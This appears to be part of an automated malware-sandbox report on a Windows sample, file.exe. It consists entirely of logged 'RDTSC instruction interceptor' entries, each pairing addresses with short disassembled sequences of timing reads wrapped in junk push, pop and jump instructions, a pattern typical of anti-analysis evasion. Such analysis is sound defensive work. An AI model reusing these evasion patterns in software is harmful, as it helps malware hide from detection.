                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63895A second address: 638988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F789CC6148Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F789CC61496h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638988 second address: 638996 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638996 second address: 63899C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63899C second address: 6389A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D6D4 second address: 63D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F789CC614A4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EC49 second address: 63EC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EC4F second address: 63EC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F789CC61486h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EC5E second address: 63EC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EC62 second address: 63EC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644446 second address: 64444A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644598 second address: 6445B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61493h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6445B3 second address: 6445CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F789C73D5B0h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644CAB second address: 644CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61490h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F789CC61499h 0x00000012 jne 00007F789CC61486h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644CE2 second address: 644CEC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644CEC second address: 644D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F789CC6148Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644D00 second address: 644D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64515D second address: 645179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61498h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645179 second address: 64517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645A29 second address: 645A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646185 second address: 64618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64618B second address: 64618F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEEE second address: 64CF0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F789C73D5B4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CF0E second address: 64CF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CF16 second address: 64CF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CF2D second address: 64CF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CF4C second address: 64CF52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D1FD second address: 64D208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789CC61486h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6580B7 second address: 6580BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6580BC second address: 6580DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F789CC6148Fh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F789CC6148Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE46 second address: 65CE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE4A second address: 65CE50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C9CD second address: 65C9E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F789C73D5AFh 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C9E4 second address: 65C9F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F789CC61486h 0x0000000a jnc 00007F789CC61486h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C9F4 second address: 65C9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C9F8 second address: 65CA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FB83 second address: 65FB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B2h 0x00000007 jl 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FB9F second address: 65FBAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F789CC61486h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FBAA second address: 65FBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F789C73D5ACh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007F789C73D5ACh 0x00000018 jmp 00007F789C73D5AAh 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FBDB second address: 65FBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789CC61486h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B135 second address: 66B171 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F789C73D5AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F789C73D5AFh 0x00000010 pushad 0x00000011 jbe 00007F789C73D5A6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F789C73D5A6h 0x00000024 jbe 00007F789C73D5A6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B171 second address: 66B17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B17D second address: 66B187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F789C73D5A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B187 second address: 66B198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F4C6 second address: 66F4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6744BF second address: 6744DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61499h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747C3 second address: 6747C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674941 second address: 674945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674945 second address: 674977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F789C73D5E5h 0x0000000d push esi 0x0000000e jmp 00007F789C73D5B9h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jbe 00007F789C73D5A6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674B1A second address: 674B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F789CC61486h 0x00000009 jmp 00007F789CC61493h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679A00 second address: 679A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679A17 second address: 679A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B226 second address: 67B22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682EA8 second address: 682EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682EAE second address: 682EE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c je 00007F789C73D5A6h 0x00000012 jmp 00007F789C73D5B3h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e jno 00007F789C73D5A6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686928 second address: 68692E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6956AC second address: 6956B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6956B0 second address: 6956B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69551C second address: 695556 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F789C73D5A6h 0x00000008 jne 00007F789C73D5A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jns 00007F789C73D5A8h 0x00000016 jmp 00007F789C73D5B3h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F789C73D5A8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695556 second address: 69555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69555A second address: 69556D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696CC5 second address: 696CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2EC second address: 69C2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2F0 second address: 69C2FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2FF second address: 69C303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C303 second address: 69C328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F789CC6148Dh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC55 second address: 6AAC5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC5B second address: 6AAC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC5F second address: 6AAC6E instructions: 0x00000000 rdtsc 0x00000002 je 00007F789C73D5A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAD86 second address: 6AADA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61498h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADA7 second address: 6AADBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789C73D5A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADBB second address: 6AADC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADC6 second address: 6AADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADCC second address: 6AADD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F789CC61488h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADD9 second address: 6AADEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F789C73D5AAh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3DE second address: 6AB3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3E4 second address: 6AB3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3EA second address: 6AB3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3EE second address: 6AB415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 jns 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F789C73D5A6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB547 second address: 6AB54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB682 second address: 6AB68E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F789C73D5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB96F second address: 6AB973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB973 second address: 6AB98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB98C second address: 6AB9B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC61499h 0x00000009 jmp 00007F789CC6148Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE622 second address: 6AE639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AEBA1 second address: 6AEBAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AEBAE second address: 6AEBFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007F789C73D5B7h 0x00000015 push dword ptr [ebp+1246A6B2h] 0x0000001b jmp 00007F789C73D5B5h 0x00000020 push 59F6AD05h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFD3A second address: 6AFD3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B184D second address: 6B1853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1853 second address: 6B1858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1858 second address: 6B1892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789C73D5B2h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F789C73D5AAh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007F789C73D5AAh 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1427 second address: 6B143A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 js 00007F789CC61494h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B326D second address: 6B3277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3277 second address: 6B327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B327D second address: 6B328A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF028B second address: 4CF02DD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F789CC61496h 0x00000008 jmp 00007F789CC61495h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F789CC6148Eh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F789CC6148Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02DD second address: 4CF02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02E3 second address: 4CF02FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02FD second address: 4CF0301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
